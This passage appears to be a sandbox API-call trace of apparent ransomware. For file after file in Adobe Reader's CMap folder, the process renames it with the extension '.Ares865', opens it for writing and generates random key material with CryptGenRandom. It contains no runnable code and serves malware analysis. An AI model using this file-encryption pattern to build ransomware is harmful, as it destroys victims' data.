param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-V.Ares865") returned 74 [0162.199] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkgccs-b5-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkgccs-b5-v.ares865"), dwFlags=0x1) returned 1 [0162.202] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkgccs-b5-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.202] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3105) returned 1 [0162.202] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.203] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.203] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.209] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.210] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.210] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.211] lstrcpyW (in: lpString1=0x2cce46e, lpString2="HKm314-B5-H" | out: lpString1="HKm314-B5-H") returned="HKm314-B5-H" [0162.211] lstrlenW (lpString="HKm314-B5-H") returned 11 [0162.211] lstrlenW (lpString="Ares865") returned 7 [0162.211] lstrcmpiW (lpString1="14-B5-H", lpString2="Ares865") returned -1 [0162.211] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-H.Ares865") returned 74 [0162.211] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm314-b5-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm314-b5-h.ares865"), dwFlags=0x1) returned 1 [0162.213] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm314-b5-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.213] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14245) returned 1 [0162.213] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.214] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.214] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.217] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.217] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.217] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.218] lstrcpyW (in: lpString1=0x2cce46e, lpString2="HKm314-B5-V" | out: lpString1="HKm314-B5-V") returned="HKm314-B5-V" [0162.218] lstrlenW (lpString="HKm314-B5-V") returned 11 [0162.218] lstrlenW (lpString="Ares865") returned 7 [0162.218] lstrcmpiW (lpString1="14-B5-V", lpString2="Ares865") returned -1 [0162.218] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-V.Ares865") returned 74 [0162.218] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm314-b5-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm314-b5-v.ares865"), dwFlags=0x1) returned 1 [0162.221] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm314-b5-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.221] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3105) returned 1 [0162.222] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.222] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.222] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.224] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.225] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.225] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.226] lstrcpyW (in: lpString1=0x2cce46e, lpString2="HKm471-B5-H" | out: lpString1="HKm471-B5-H") returned="HKm471-B5-H" [0162.226] lstrlenW (lpString="HKm471-B5-H") returned 11 [0162.226] lstrlenW (lpString="Ares865") returned 7 [0162.226] lstrcmpiW (lpString1="71-B5-H", lpString2="Ares865") returned -1 [0162.226] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-H.Ares865") returned 74 [0162.226] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm471-b5-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm471-b5-h.ares865"), dwFlags=0x1) returned 1 [0162.236] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm471-b5-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.236] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17365) returned 1 [0162.237] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.237] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.238] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.241] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.242] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.242] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.243] lstrcpyW (in: lpString1=0x2cce46e, lpString2="HKm471-B5-V" | out: lpString1="HKm471-B5-V") returned="HKm471-B5-V" [0162.243] lstrlenW (lpString="HKm471-B5-V") returned 11 [0162.243] lstrlenW (lpString="Ares865") returned 7 [0162.243] lstrcmpiW (lpString1="71-B5-V", lpString2="Ares865") returned -1 [0162.243] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-V.Ares865") returned 74 [0162.243] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm471-b5-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm471-b5-v.ares865"), dwFlags=0x1) returned 1 [0162.247] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm471-b5-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.247] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3105) returned 1 [0162.248] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.248] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.248] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.251] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.251] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.251] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.252] lstrcpyW (in: lpString1=0x2cce46e, lpString2="HKscs-B5-H" | out: lpString1="HKscs-B5-H") returned="HKscs-B5-H" [0162.252] lstrlenW (lpString="HKscs-B5-H") returned 10 [0162.252] lstrlenW (lpString="Ares865") returned 7 [0162.252] lstrcmpiW (lpString1="cs-B5-H", lpString2="Ares865") returned 1 [0162.252] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-H.Ares865") returned 73 [0162.252] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkscs-b5-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkscs-b5-h.ares865"), dwFlags=0x1) returned 1 [0162.255] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkscs-b5-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.255] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24653) returned 1 [0162.255] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.256] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.256] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.260] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.261] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.261] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.262] lstrcpyW (in: lpString1=0x2cce46e, lpString2="HKscs-B5-V" | out: lpString1="HKscs-B5-V") returned="HKscs-B5-V" [0162.262] lstrlenW (lpString="HKscs-B5-V") returned 10 [0162.262] lstrlenW (lpString="Ares865") returned 7 [0162.262] lstrcmpiW (lpString1="cs-B5-V", lpString2="Ares865") returned 1 [0162.262] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-V.Ares865") returned 73 [0162.262] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkscs-b5-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkscs-b5-v.ares865"), dwFlags=0x1) returned 1 [0162.264] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkscs-b5-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.264] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3120) returned 1 [0162.264] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.265] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.265] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.269] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.270] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.270] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.271] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Identity-H" | out: lpString1="Identity-H") returned="Identity-H" [0162.271] lstrlenW (lpString="Identity-H") returned 10 [0162.271] lstrlenW (lpString="Ares865") returned 7 [0162.271] lstrcmpiW (lpString1="ntity-H", lpString2="Ares865") returned 1 [0162.271] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-H.Ares865") returned 73 [0162.271] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\identity-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\identity-h.ares865"), dwFlags=0x1) returned 1 [0162.273] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\identity-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.274] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8228) returned 1 [0162.274] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.275] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.275] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.278] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.278] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.278] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.279] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Identity-V" | out: lpString1="Identity-V") returned="Identity-V" [0162.279] lstrlenW (lpString="Identity-V") returned 10 [0162.279] lstrlenW (lpString="Ares865") returned 7 [0162.279] lstrcmpiW (lpString1="ntity-V", lpString2="Ares865") returned 1 [0162.279] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-V.Ares865") returned 73 [0162.279] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\identity-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\identity-v.ares865"), dwFlags=0x1) returned 1 [0162.281] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\identity-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.281] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2761) returned 1 [0162.282] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.282] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.282] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.286] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.286] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.286] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.287] lstrcpyW (in: lpString1=0x2cce46e, lpString2="KSC-EUC-H" | out: lpString1="KSC-EUC-H") returned="KSC-EUC-H" [0162.287] lstrlenW (lpString="KSC-EUC-H") returned 9 [0162.287] lstrlenW (lpString="Ares865") returned 7 [0162.287] lstrcmpiW (lpString1="C-EUC-H", lpString2="Ares865") returned 1 [0162.287] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-H.Ares865") returned 72 [0162.287] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ksc-euc-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ksc-euc-h.ares865"), dwFlags=0x1) returned 1 [0162.289] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ksc-euc-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.289] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12359) returned 1 [0162.290] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.290] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.290] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.293] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.294] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.294] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.294] lstrcpyW (in: lpString1=0x2cce46e, lpString2="KSC-EUC-V" | out: lpString1="KSC-EUC-V") returned="KSC-EUC-V" [0162.294] lstrlenW (lpString="KSC-EUC-V") returned 9 [0162.294] lstrlenW (lpString="Ares865") returned 7 [0162.294] lstrcmpiW (lpString1="C-EUC-V", lpString2="Ares865") returned 1 [0162.295] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-V.Ares865") returned 72 [0162.295] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ksc-euc-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ksc-euc-v.ares865"), dwFlags=0x1) returned 1 [0162.297] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ksc-euc-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.298] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3199) returned 1 [0162.298] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.299] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.299] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.301] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.302] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.302] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.302] lstrcpyW (in: lpString1=0x2cce46e, lpString2="KSCms-UHC-H" | out: lpString1="KSCms-UHC-H") returned="KSCms-UHC-H" [0162.302] lstrlenW (lpString="KSCms-UHC-H") returned 11 [0162.302] lstrlenW (lpString="Ares865") returned 7 [0162.303] lstrcmpiW (lpString1="s-UHC-H", lpString2="Ares865") returned 1 [0162.303] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-H.Ares865") returned 74 [0162.303] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-h.ares865"), dwFlags=0x1) returned 1 [0162.306] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.306] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16785) returned 1 [0162.306] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.307] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.307] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.310] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.310] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.310] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.311] lstrcpyW (in: lpString1=0x2cce46e, lpString2="KSCms-UHC-HW-H" | out: lpString1="KSCms-UHC-HW-H") returned="KSCms-UHC-HW-H" [0162.311] lstrlenW (lpString="KSCms-UHC-HW-H") returned 14 [0162.311] lstrlenW (lpString="Ares865") returned 7 [0162.311] lstrcmpiW 